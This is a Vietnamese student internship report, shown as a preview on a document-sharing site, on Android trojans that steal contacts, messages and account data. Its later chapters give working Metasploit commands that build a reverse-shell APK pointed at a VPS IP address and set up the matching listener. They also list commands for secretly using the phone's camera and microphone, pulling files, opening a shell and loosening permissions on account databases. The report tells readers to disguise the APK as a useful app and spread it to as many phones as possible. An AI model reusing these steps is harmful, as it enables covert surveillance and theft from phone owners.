BÁO cáo đề tài THỰC tập CNTT nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng android và gửi ra ngoài

80 569 0
BÁO cáo đề tài THỰC tập CNTT nghiên cứu các trojan, malware cho phép đánh cắp dữ liệu như danh sách contact, tin nhắn trên điên thoại sử dụng android và gửi ra ngoài

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi CBHD: Thầy VÕ ĐỖ THẮNG SVTH: Nguyễn Đức Thái MSSV: 51002962 TPHCM, ngày 18 tháng 08 năm 2014 ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINH TRƯỜNG ĐẠI HỌC BÁCH KHOA KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi CBHD: Thầy VÕ ĐỖ THẮNG SVTH: Nguyễn Đức Thái MSSV: 51002962 TPHCM, ngày 18 tháng 08 năm 2014 Báo cáo thực tập CBHD: Võ Đỗ Thắng LỜI CẢM ƠN KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH Tơi xin chân thành cảm ơn trường Đại học Bách Khoa thành phố Hồ Chí Minh khoa Khoa Học Kỹ Thuật Máy Tính tạo điều kiện cho tơi tham gia hồn thành tốt đợt thực tập Để cho làm việc học hỏi làm việc môi trường chuyên nghiệp với kinh nghiệm hữu ích Những kinh nghiệm giúp tơi hồn thiện cơng việc sau Tôi xin cảm ơn quý thầy khoa tận tình giảng dạy trang bị cho tơi kiến thức thiết yếu để hồn thành đợt thực tập Một lần nữa, xin chân thành cảm ơn Hồ Chí Minh, Ngày 18 tháng Năm 2014 Sinh viên thực tập Nguyễn Đức Thái SVTH: Nguyễn Đức Thái Trang i Báo cáo thực tập CBHD: Võ Đỗ Thắng LỜI CẢM ƠN TRUNG TÂM ATHENA Tôi xin chân thành cảm ơn Ban giám đốc Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế Athena, tồn thể anh chị cơng ty tận tình giúp đỡ tơi đợt thực tập vừa qua, tạo điều kiện để tơi có hội tham gia hoàn thành thực tập trung tâm Đặc biệt, xin chân thành cảm ơn thầy Võ Đỗ Thắng tận tình giúp đỡ, cung cấp tài liệu tham khảo, hướng dẫn tơi để hồn thành đề tài tốt Mặc dù cố gắng hoàn thành báo cáo thực tập tốt với tất nỗ lực thân lực hiểu biết kinh nghiệm thân chắn không tránh khỏi thiếu sót định, mong thơng cảm, chia sẻ tận tình để tơi hồn thành báo cáo thực tập tốt Một lần nữa, tơi xin chân thành cảm ơn Hồ Chí Minh, Ngày 18 tháng Năm 2014 Sinh viên thực tập Nguyễn Đức Thái SVTH: Nguyễn Đức Thái Trang ii Báo cáo thực tập CBHD: Võ Đỗ Thắng TRÍCH YẾU Trong số thành tựu quan trọng mà nhận loại đạt thời gian gần phát triển nhảy vọt kỹ thuật truyền thông Đặc biệt điện thoại di động, mà người giao tiếp với bất chấp khoảng cách Chúng ta quen với điện thoại di động ln bên lúc nơi, đơn giản tính tiện lợi hữu ích Chúng ta nghe, gọi, nhắn tin, lướt web, xem video, … chí cịn thực giao dịch ngân hàng Điện thoại di động có chứa hầu hết thông tin cá nhân người sử dụng địa nhà, tài khoản ngân hàng, hồ sơ quan trọng, Câu hỏi đặt ra, liệu thơng tin bị đánh cắp không? Đề tài cho nhìn khái qt việc đánh cắp, hack thơng tin, nghe lén,… điện thoại di động, đặc biệt điện thoại sử dụng hệ điều hành Android Tôi cam kết, kết đạt tự thực hướng dẫn thầy Võ Đỗ Thắng (Trung tâm Athena), không chép từ người khác Các bước q trình thực tơi ghi lại video có thuyết minh bước Chi tiết clip ghi lại trình thực liệt kê bên Danh sách Clip:  Giới thiệu đề tài http://youtu.be/7D7qH5P5UD8  Tìm hiểu mã độc Android cài đặt iCalendar http://youtu.be/mldXNwKSt_4  Cài đặt iMatch http://youtu.be/D7HWiixk2sU  Tìm hiểu cài đặt Kali Linux http://youtu.be/LN-m6868hV8  Sử dụng Kali Linux công Android mạng LAN http://youtu.be/7km1lwNr1Cg  Cài đặt Metasploit máy chủ ảo VPS http://youtu.be/lFGBUVgDhk8  Sử dụng Merasploit VPS công Android mạng internet http://youtu.be/6s6lYJngkXs SVTH: Nguyễn Đức Thái Trang iii Báo cáo thực tập CBHD: Võ Đỗ Thắng NHẬN XÉT CỦA KHOA TPHCM, ngày tháng năm 2014 Trưởng Khoa SVTH: Nguyễn Đức Thái Trang iv Báo cáo thực tập CBHD: Võ Đỗ Thắng NHẬN XÉT CỦA CÔNG TY THỰC TẬP TPHCM, ngày tháng năm 2014 Giám đốc SVTH: Nguyễn Đức Thái Trang v Báo cáo thực tập CBHD: Võ Đỗ Thắng NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN TPHCM, ngày tháng năm 2014 Giáo viên hướng dẫn SVTH: Nguyễn Đức Thái Trang vi Báo cáo thực tập CBHD: Võ Đỗ Thắng MỤC LỤC LỜI CẢM ƠN KHOA KHOA HỌC VÀ KỸ THUẬT MÁY TÍNH i LỜI CẢM ƠN TRUNG TÂM ATHENA ii TRÍCH YẾU iii NHẬN XÉT CỦA KHOA iv NHẬN XÉT CỦA CÔNG TY THỰC TẬP v NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN vi MỤC LỤC vii DANH MỤC HÌNH x DANH MỤC BẢNG xiii CHƯƠNG 0: GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP .1 CHƯƠNG 1: TỔNG QUAN VỀ ANDROID 1.1 Khái niệm 1.2 Đặc điểm 1.3 Lịch sử phát triển 1.4 Sự mắt phiên Android CHƯƠNG 2: CÀI ĐẶT VÀ NGHIÊN CỨU HỆ ĐIỀU HÀNH ANDROID TRÊN MÔI TRƯỜNG GIẢ LẬP 2.1 Cài đặt hệ điều hành Android 2.3 4.x môi trường giả lâp 2.1.1 Cài đặt Java SE máy tính 2.1.2 Cài đặt Eclipse Android SDK 2.1.3 Tạo máy AVD (Android Virtual Device) .11 2.2 So sánh khác hai phiên Android 2.3 4.x 15 2.2.1 Sự khác yêu cầu phần cứng cần thiết để cài đặt 15 2.2.2 Sự khác giao diện 15 2.2.3 Sự khác tính 17 2.2.4 Sự khác giao thức mạng 17 CHƯƠNG 3: MÃ ĐỘC TRÊN ANDROID 18 3.1 Định nghĩa .18 3.2 Mã độc môi trường Android 18 3.2.1 Android môi trường lý tưởng cho mã độc phát triển 18 3.2.2 Phân loại mã độc Android 18 SVTH: Nguyễn Đức Thái Trang vii Báo cáo thực tập CBHD: Võ Đỗ Thắng 3.3 Thực trạng 19 3.4 Malware – tiêu biểu mã độc Android 20 3.5 Cơ chế hoạt động Malware .20 3.6 Mục đích Malware DroidDream 21 3.7 Cơ chế bảo mật Android 21 3.7.1 Tính bảo mật Android 21 3.7.2 Cơ chế Permission: 22 3.7.3 Google Play: 22 CHƯƠNG 4: CÀI ĐẶT MỘT SỐ CHƯƠNG TRÌNH CĨ MÃ ĐỘC TRÊN ANDROID .23 4.1 iCalendar 23 4.1.1 Các công cụ cần thiết: 23 4.1.2 Các bước thực hiện: .23 4.2 iMatch 28 4.2.1 Các công cụ cần thiết: 28 4.2.2 Các bước thực hiện: .28 CHƯƠNG 5: NGHIÊM CỨU KALI LINUX, CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALINIX ĐỂ XÂM NHẬP VÀO ANDROID .31 5.1 Tổng quan 31 5.2 Cải tiến Kali Linux so với Backtrack .31 5.2.1 Kali phát triển tảng hệ điều hành Debian 31 5.2.2 Tính tương thích kiến trúc 31 5.2.3 Hỗ trợ mạng không dây tốt 31 5.2.4 Khả tùy biến cao 32 5.2.5 Dễ dàng nâng cấp phiên Kali tương lai 32 5.3 Cài đặt Kali Linux 32 5.3.1 Chuẩn bị 32 5.3.2 Cài đặt .32 5.4 Tạo mã độc Kali Linux để xâm nhập Android 45 5.5 Kết luận 54 CHƯƠNG 6: XÂM NHẬP VÀO ANDROID THÔNG QUA INTERNET TỪ VPS 55 6.1 Cài đặt Metasploit VPS 55 6.2 Tấn công Android từ VPS .60 SVTH: Nguyễn Đức Thái Trang viii Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 5.38: Lệnh ipconfig Nhóm lệnh sử dụng camara, mic: Lệnh webcam_list: hiển thị danh sách camara Để chụp hình camera, nhập webcam_snap –i với id camera xem danh sách camera phần trước Ví dụ sau: Hình 5.39: nhóm lệnh camara File hình chụp từ camera máy android RbWBRryj.jpeg lưu /root máy Hình 5.40: File ảnh chụp bảng lệnh webcam_snap Để thực ghi âm, nhập lênh record_mic file ghi âm lưu máy SVTH: Nguyễn Đức Thái Trang 51 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 5.41: lệnh record_mic Ta file ghi âm Hình 5.42: File ghi âm lệnh record_mic Nhóm lệnh sử lý file, thư mục: Lệnh cd: di chuyển đến thư mục định Lệnh ls: hiển thị thơng tin file có thư mục Để vào sdcard, nhập lệnh: cd /sdcard lệnh ls để xem danh sách file, thư mục Hình 5.43: Lệnh ls thư mục sdcard Lệnh dowload: tải file máy Ví dụ đây, ta tải file App.apk thư mục sdcard.dùng lệnh download App.apk SVTH: Nguyễn Đức Thái Trang 52 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 5.44: Lệnh download Và file tải thư mục root máy Kali Hình 5.45: File download Lệnh shell: điều khiển môi trường terminal máy Android Nhập lệnh shell để điều khiển máy môi trường terminal Tại ta nhập lệnh ls –l để xem file quyền hạn cần để sử dụng SVTH: Nguyễn Đức Thái Trang 53 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 5.4: Lệnh ls –l Như bạn thấy thư muc data cần quyền hạn cao để tiến hành sử dụng Mà liệu quan trọng Contacts, SMS, tài khoản đồng Google… lưu Vì ta lấy cắp thơng tin máy Android bị xâm nhập root (hack chiếm quyền điều khiển cao nhất) Trong số trường hợp, người dùng máy Android sử dụng số chương trình Backup and Retore tiến hành lưu trữ lại thông tin quan trọng đến nhơ máy Ta lấy file cách dễ dàng 5.5 Kết luận Như vậy, ta tìm hiểu Kali Linux, cải tiến so với BackTrack Cách sử dụng Metasploit Kali Linux để xâm nhập điều khiển, truyền liệu từ máy Android máy Sau thử nghiệm cách công này, ta rút không nên tải chạy file lạ máy android để bảo đảm không cài nhầm backdoor thấy trên, tiến hành bảo vệ máy với chương trình Anti-virus, khơng tiến hành root may khơng thực cần thiết cần máy bị nhiễm backdoor ta xem có tồn quyền kiểm sốt máy Android SVTH: Nguyễn Đức Thái Trang 54 Báo cáo thực tập CBHD: Võ Đỗ Thắng CHƯƠNG 6: XÂM NHẬP VÀO ANDROID THƠNG QUA INTERNET TỪ VPS Với phần tìm hiều ta thực xâm nhập vào Android qua mạng LAN Phần ta tiếp tục tìm hiểu cách xâm nhập vào Android qua mạng Internet với VPS 6.1 Cài đặt Metasploit VPS Đầu tiên, ta cần có máy chủ ảo VPS tiến hành kết nồi Ở sử dụng Romote Desktop Connection Windows Hình 6.1: Kết nối VPS Nhập địa IP VPS sau tiến hành đăng nhập SVTH: Nguyễn Đức Thái Trang 55 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 6.2: Đăng nhập VPS Tiếp theo, VPS ta cần download cài đặt Metasploit địa sau: http://www.metasploit.com/ Hình 6.3: Download metasploit Chọn FREE METASPLOIT DOWNLOAD để tiêp tục Hình 6.4: Chọn phiên metasploit Tại có hai phiên lựa chọn: Pro có dùng thử 14 ngày sau phải trả phí để tiếp tục sử dụng Community miễn phí với số tính bị hạn chế Ở chọn sử dụng Community để nghiên cứu SVTH: Nguyễn Đức Thái Trang 56 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 6.5: điền thơng tin Tại điền đầy đủ thông tin trang web yêu cầu sau nhấn SUBMIT & DOWNLOAD để tiến hành tải xuống Sau tải xong ta file metasploit-latest-windows-installer.exe mở file lên để tiến hành cài đặt Hình 6.6: Cài đặt metasploit Chọn Next để tiếp tục SVTH: Nguyễn Đức Thái Trang 57 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 6.7: Xác nhận điều khoản Chọn I accept the agreement để xác nhận điều khoản sử dụng sau chọn Next Hình 6.8: Địa cài đặt Xác định đường dẫn cài đặt Metasploit chọn Next SVTH: Nguyễn Đức Thái Trang 58 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 6.9: Tắt Anti-Virus Firewall Chương trình nhắc nhở tắt ứng dụng Anti-Virus Firewall Ta tiến hành tắt ứng dụng sau chọn Next Hình 6.10: SSL Port Đặt SSL Port cho Metasploit service => Next SVTH: Nguyễn Đức Thái Trang 59 Báo cáo thực tập CBHD: Võ Đỗ Thắng Hình 6.11: Server name Chọn Server Name Day of Validity chọn Next hai lần để bắt đầu cài đặt Sau tiến trình chạy xong ta chọn Finish để kết thúc Hình 6.12: Cài đặt thành cơng Như ta cài đặt thành công Metasploit máy chủ ảo VPS 6.2 Tấn công Android từ VPS Để tiến hành, ta khởi động Kali Linux để tạo file apk có chứa mã độc nhằm phục vụ cho việc công Android (chi tiết bước thực tham khảo trên) Trong Kali Linux khởi động Terminal tiến hành nhập lệnh: SVTH: Nguyễn Đức Thái Trang 60 Báo cáo thực tập CBHD: Võ Đỗ Thắng Msfpayload android/meterpreter/reverse_tcp lport=4444 R> /root/Desktop/vps.apk lhost=103.20.148.71 Trong lhost=103.20.148.71 địa IP VPS Hình 6.13: Tao backdoor Sau chạy xong ta file vps.apk file có chứa mã độc dùng để cơng Android Ở việc cần làm phát tán file đến nhiều máy Android tốt Ta thực cách ngụy trang thành ứng dụng có ích chia sẻ diễn đàn điện thoại Android Tiếp theo tiến hành kết nối đến VPS khởi động Metasploit Console đường dẫn Start => Programs => Metasploit => Metasploit Console Hình 6.14: Metasploit console Tại sổ dòng lệnh ta nhập: Use exploit/multi.hander Set payload android/meterpreter/reverse_tcp SVTH: Nguyễn Đức Thái Trang 61 Báo cáo thực tập CBHD: Võ Đỗ Thắng Set lhost 103.20.148.71 – với lhost địa IP VPS nhập Set lport 4444 – tương tự lport Hình 6.15: thiết lập thơng tin cho cổng lắng nghe Tiếp theo nhập lện run để mở cổng lắng nghe Hình 6.16: mở cổng lắng nghe Sau hồn thành bước này, việc cần làm chờ có máy Android có kết nối internet cài đặt, khởi động file vps.apk Khi ta hình: Hình 6.17: Kết nối thành công Như ta thành công xâm nhập vào máy Android Tại ta tiến hành điều khiển, đánh căp liệu trình bày phần sử dụng Kali Linux Mặc dù thành công xâm nhập vào Android số trường hợp trình khai thác liệu báo lỗi không đủ quyền hạn truy cập hệ thống Đây chế bảo mật Android để bảo vệ liệu quan trọng Trong trường hợp này, việc khai thác liệu gặp nhiều hạn chế thông thể thực với liệu quan trọng SVTH: Nguyễn Đức Thái Trang 62 Báo cáo thực tập CBHD: Võ Đỗ Thắng Một trường hợp khác sau xâm nhập thành cơng vào Android liền có quyền hàn tối cao (system) Đây máy Android bị xâm nhập người sử dụng root (chiếm quyền điều khiển) Trường hợp ta tùy ý khai thác máy Android Để kiểm tra máy Android root chưa ta vào điều khiển môi trường shell nhập lệnh : su whoami Nếu báo unknown id is tức root ls -l danh mục file quyền cd để chuyển hướng thư mục Để ăn cắp tài khoản, mật khẩu, file apk thay đổi quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ Để xem danh sách download file hay thay đổi file ROM Đầu tiên phải gõ lệnh SU để có tồn quyền truy cập để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data Ctrl + C để quay lại Sử dụng SQLite để mở file db SVTH: Nguyễn Đức Thái Trang 63 Báo cáo thực tập CBHD: Võ Đỗ Thắng CHƯƠNG 7: KẾT QUẢ ĐẠT ĐƯỢC Những kiến thức lý thuyết củng cố:  Tìm hiểu lịch sử, trình phát triển hệ điều hành Android  Tìm hiểu hệ điều hành Kali Linux  Tìm hiểu lỗ hổng bảo mật Windows Android  Tìm hiểu cách sửa đổi file APK thực Signing ứng dụng Những kỹ thực hành học thêm:  Thực cài đặt Android máy ảo  Cài đặt Kali Linux, sử dụng để hack vào lỗ hổng bảo mật Windows Android  Thi lấy chứng System Hacking trung tâm Athena  Thực sửa đổi, tạo file Trojan, Backdoor sau cài đặt vào Android  Biết thêm số học lớp Hacker mũ trắng Những kinh nghiệm thực tiễn tích lũy được: Qua gần tháng thực tập, thân em đúc kết nhiều kinh nghiệm quý báu, thứ kĩ chuyên môn, em học cố kiến thức bên cạnh kiến thức tảng Hơn trình thực tập mơi trường doanh nghiệp cho em làm quen dần để không bỡ ngỡ trình làm sau này, thơng qua kĩ giao tiếp ứng xử SVTH: Nguyễn Đức Thái Trang 64 Báo cáo thực tập CBHD: Võ Đỗ Thắng CHƯƠNG 8: TÀI LIỆU THAM KHẢO [1] Đĩa lab Athena Android [2] http://www.vietnamandroid.com/ [3] http://vi.wikipedia.org/wiki/Android [4] http://forum.genk.vn/threads/147/ [5] http://phienbanmoi.com/threads/lich-su-ra-doi-he-dieu-hanh-android-tai-lieuhuong-dan-lap-trinh.107/ [6] http://sohoa.vnexpress.net/tin-tuc/doi-song-so/thi-truong/ios-bam-duoi-quyetliet-android-ve-thi-phan-di-dong-2960981.html [7] http://forum.bkav.com.vn/showthread.php/99182-hieu-chinh-xac-ve-cac-loaima-doc [8] http://www.nguoiduatin.vn/mat-39-ty-dongngay-vi-ma-doc-a137388.html SVTH: Nguyễn Đức Thái Trang 65 ... AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT Nghiên cứu Trojan, Malware cho phép đánh cắp liệu danh sách contact, tin nhắn điên thoại sử dụng Android gửi CBHD: Thầy VÕ ĐỖ THẮNG SVTH:... Android virus trojan, dạng virus chủ yếu để sử dụng để đánh cắp tiền người dùng bị lây nhiễm cách gửi đến họ tin nhắn lừa đảo, đọc thông tin cần thiết gửi báo cáo đến nơi khác, ăn cắp thông tin. .. DroidDream nhúng vào ứng dụng (số lượng ứng dụng chứa Malware nhiều 50 ứng dụng) chiếm quyền root vào thiết bị bạn sau bạn chạy ứng dụng lần sử dụng SVTH: Nguyễn Đức Thái Trang 20 Báo cáo thực tập CBHD:

Ngày đăng: 17/10/2014, 22:08

Từ khóa liên quan

Tài liệu cùng người dùng

  • Đang cập nhật ...

Tài liệu liên quan